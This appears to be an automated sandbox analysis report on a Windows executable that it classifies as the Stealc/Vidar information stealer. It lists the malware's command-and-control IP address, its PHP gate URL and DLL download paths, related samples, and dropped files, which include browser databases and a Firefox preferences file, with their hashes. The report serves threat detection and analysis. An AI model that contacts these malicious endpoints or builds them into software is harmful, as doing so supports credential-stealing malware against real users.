http://185.215.113.37/0d60be0de163924d/sqlite3.dllV	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll8	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpZ	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpB	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php?	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dllJ	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpH	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php.	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php4	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php3	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php:	100%	Avira URL Cloud	malware
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpwser	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dllg	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php#	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dlll	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phpefox	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpdowsApps	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/b	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlly	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php.dllA	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll0	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpw	file.exe, 00000000.00000002.1638110314.0000000001278000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpa	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666695597.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpll	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37d	file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllV	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll8	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpZ	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpB	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php?	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllJ	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php.	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA	file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php4	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php:	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org	CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllg	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php#	file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlll	file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37e2b1563c6670f193.phpefox	file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518819
Start date and time:	2024-09-26 02:39:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 108
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	iubXkDP5lk.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	IWXaKkm4pm.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	7l2s6qwHg7.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	iubXkDP5lk.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AFCBFIJEHDHCBGDGDGCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKEGDHJDHDAFHJJKJEHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\AKKKFBGDHJKFHJJJJDGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFCFBKKKFHCFHJKFIIEHDBGCBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAKKKFBFIDGDBFHJJEHIDHDAAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAECAECFCAAEBFHIEHDGHDHCBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDGIEGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDAAFBGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
